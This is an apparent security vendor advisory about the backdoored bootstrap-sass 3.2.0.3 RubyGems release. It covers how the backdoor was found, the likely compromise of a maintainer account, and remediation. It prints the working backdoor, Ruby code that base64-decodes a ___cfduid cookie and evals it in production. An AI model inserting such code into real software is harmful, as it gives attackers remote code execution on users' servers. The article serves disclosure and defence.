Remote Code Execution in bootstrap-sass Ruby Package

If you are using Ruby to develop applications, run the latest update of Acunetix to make sure that you are safe. A very popular Rails gem bootstrap-sass was recently compromised. A malicious version of the package (3.2.0.3) was available in the official RubyGems repository for several days. This version allowed remote code execution (code injection).

Suspicious Code on RubyGems

On March 26, one of the users of bootstrap-sass, Derek Barnes, noticed a suspicious event. Someone published a new version of bootstrap-sass on RubyGems (3.2.0.3) but did not release it on GitHub. At the same time, someone yanked the previous version of the gem (3.2.0.2) from RubyGems. Nobody mentioned or explained either of these events in changelogs. This made Derek very suspicious. He used diff to compare the two versions and found a suspicious code fragment:

begin
require 'rack/sendfile'
if Rails.env.production?
Rack::Sendfile.tap do |r|
r.send :alias_method, :c, :call
r.send(:define_method, :call) do |e|
begin
x = Base64.urlsafe_decode64(e['http_cookie'.upcase].scan(/___cfduid=(.+);/).flatten[0].to_s)
eval(x) if x
rescue Exception
end
c(e)
end
end
end
rescue Exception
nil
end

If the application runs in production mode (if Rails.env.production), the code accepts content from a user cookie (___cfduid). Then, it decodes it using base64 and runs eval on the result (remotely executes whatever is provided). Derek published a thread on GitHub to seek an explanation. Soon after, the maintainers of bootstrap-sass confirmed that the added code is indeed a backdoor.

How Did It Happen?

At the time of writing, the two bootstrap-sass maintainers still do not know how the attacker managed to insert the backdoor. They don’t even know which of the two accounts was compromised. This leaves no guarantee that it won’t happen again. Unfortunately, the security of the RubyGems repository leaves a bit to be desired. There are no activity logs and multi-factor authentication is not required.

One of the project maintainers, Gleb Mazovetskiy, admitted: “I did have a relatively weak password for RubyGems (I created my account there a long time ago before any of the current password policies were in place).” The other maintainer, Thomas McDonald, decided to step back: “Given my lack of activity on this project, I’m also happy to revoke my write access to the gem.” He also mentioned that it would be good if RubyGems improved their security.

The Dangers of Open Source

Such cases become more common as attackers realize the incredible reach that open source software has. They use different techniques such as phishing or social engineering to get access to popular packages. For example, a similar attack occurred last October when a cryptocurrency-stealing code fragment was introduced into a Node.js package. In that case, the attacker simply convinced the legitimate maintainer to give him write access and then locked that maintainer out.

Luckily, despite the popularity of bootstrap-sass (more than 28 million downloads in total), the malicious version was only downloaded 1,477 times because it is an obsolete branch. The maintainers immediately yanked the backdoor code upon discovery and published a new version on April 4 (3.2.0.4). This version was exactly the same as 3.2.0.2 (the one that was yanked by the malicious actor). However, maintainers also recommend upgrading to the latest branch (3.4.x).